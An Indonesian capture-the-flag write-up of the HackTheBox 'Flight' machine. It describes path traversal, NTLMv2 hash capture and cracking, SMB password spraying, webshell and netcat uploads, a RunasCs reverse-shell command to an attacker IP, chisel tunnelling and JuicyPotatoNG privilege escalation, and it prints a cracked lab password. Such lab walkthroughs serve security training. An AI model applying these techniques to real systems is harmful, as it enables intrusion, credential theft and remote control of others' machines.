HackTheBox - Flight Writeups

HackTheBox Flight Writeups

Scanning dengan nmap. Berikut port terbuka sebagai berikut:

┌──(root㉿yupy)-[~/yp/hackthebox/Flight]
└─# nmap -sC -sV 10.10.11.187 
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 17:43 PST
Nmap scan report for 10.10.11.187
Host is up (0.035s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: g0 Aviation
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-22 08:44:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m01s
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-12-22T08:44:13
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.81 seconds

Scanning dengan Nikto untuk melihat vulnerability Assessment yang ada: image

Fuzzing directory dengan berbagai tools Dirsearch dan Dirb: image image

Fuzzing subdomain flight.htb dengan wfuzz tools, disini kita menemukan subdomain school. image

Kita juga menggunakan tools scanning Burp Suite, dari scan deep dari BurpSuite kami menemukan kerentanan tentang File Path Travesal yang ada pada parameter view:. Disini bila menggunakan payload file:///c:/windows/win.ini yang telah kita encode urlnya. Kita bisa melihat version pada windows tersebut dengan payload ini. image image image

Dari kita mencoba melihat file lokal di server, kita dapat mencoba RFI yang berpontial SSRF juga di server target, sehingga bila kita menginputkan url server kita akan mengautentikasi dan menunjukkan kepada kita hash ntlmv2 dari pengguna yang sedang berjalan, seperti di server yang merespons, disini kita menggunakan responder untuk mendapatkan responya: image image image

Setelah mendapatkan hash ntmlv2 kita juga crack hash tersebut dengan tools John, dan disini kita mendapatkan password: image

Kita disini mencoba mencocokan password kredensial yang terhubung dengan smb server target tersebut, dan kita mendapatkanya bila password itu cocok dengan user svc_apache image

Kita melanjutkanya untuk melihat user lain yang ada di Smb server target. Disini kita melihat semua user yang ada pada Smb server target tersebut. image image

Setelah kami membuat file dengan user yang didapat tadi, dan disini kita mencoba mencocokan kredential lagi. Disini kita mendapatkan users dengan password yang cocok selain svc_apache yaitu S.Moon. image image image

S.Moon menggunakannya, kita dapat mencari direktori seseorang yang memiliki izin. image

Kita mencoba login dengan smbclient dan kita dapat masuk. Disini tidak ada file apapun namun kita mencoba memasukan payload yang saya dapatkan dari hacktricks image

Disini kita membuat payload yang nantinya kita akan mendapatkan Hash lagi dari response backconnect: image image image

Seperti biasa untuk crack hash ntmlv2 yang di dapat dari backconnect tadi, dan mendapatkanya passwordnya. image

Setelah kita crack passwordnya mencoba melihat directory share dengan user C.Bum dan password Tikkycoll_431012284. image

Disini kita mencoba login dengan user dan password tadi, terdapat directory flight.htb dan school.flight.htb yang berarti directory ini adalah directory yang memuat halaman page tadi. image

Setelah itu kita mencoba mengupload webshell wwwolf yang kita gunakan backconnect nantinya. image image

Setelah berhasil kita mengupload netcat yang didapat dari github: netcat yang kita akan upload ke dalam server. Berhasil terupload netcatnya kita backconnect an dengan netcat pc kita. image image

Disini mencoba privileges escalation pada server yang menggunakan windows ini, dengan menggunakan RunaCS ini kita dapat menjalakan command powershell lebih detail lagi. image

Dan kita sambungkan dengan netcat yang bila nanti kita buka akan menggunakan command powershell.

.\RunasCs.exe C.bum Tikkycoll_431012284 powershell -r 10.10.14.7:7333

image image

Bagaimana cara privileges escalation dengan server ini? Kita akan menemukanya, setelah kita melihat lihat isi server ini. image

Kita disini dapat melihat isi user.txt yang berada di user C.Bum tetapi kita tidak bisa melihat isi user administrator. image

Setelah mencari lebih dalam kita menemukan bahwa kalau kita membuka netstat dengan command netstat -oat kita akan melihat port 8000 yang berarti port ini mendapatkan isi web yang mungkin menampilkan halaman page baru. image

Kita disini menggunakan chisel untuk melihat yang ada pada port 8000 dengan cara menghubungkan port ini kedalam server kita. Dengan mengupload chisel yang saya dapatkan dari chisel jalankan chisel server target dan server pc kita sendiri. image image image

Disini bila kita membuka port 8000 dengan localhost akan memunculkan tampilan seperti gambar dibawah. image

Mencari dimana letak source code halaman page ini, dan kita menemukanya letak source code port 8000 di directory C:\inetpub\development image image

Selanjutnya kita mencoba upload shell cmd yang saya punyai. image image

Kita mencoba backconnect an lagi dengan netcat. Disini kami melakukan pencarian yang bisa untuk mendapatkan user Administrator secara langsung. image

Dengan menambahkan command whoami /priv kita dapat melihat bahwa memungkinkan privileges escalation. Referensi image

Disini kita menggunakan JuicyPotatoNG untuk menaikan user biasa ke user administrator. Dengan command dibawah kita bisa mendapatkan nt authority\system yang dapat melakukan eksekusi apapun yang terdapat di server. image image image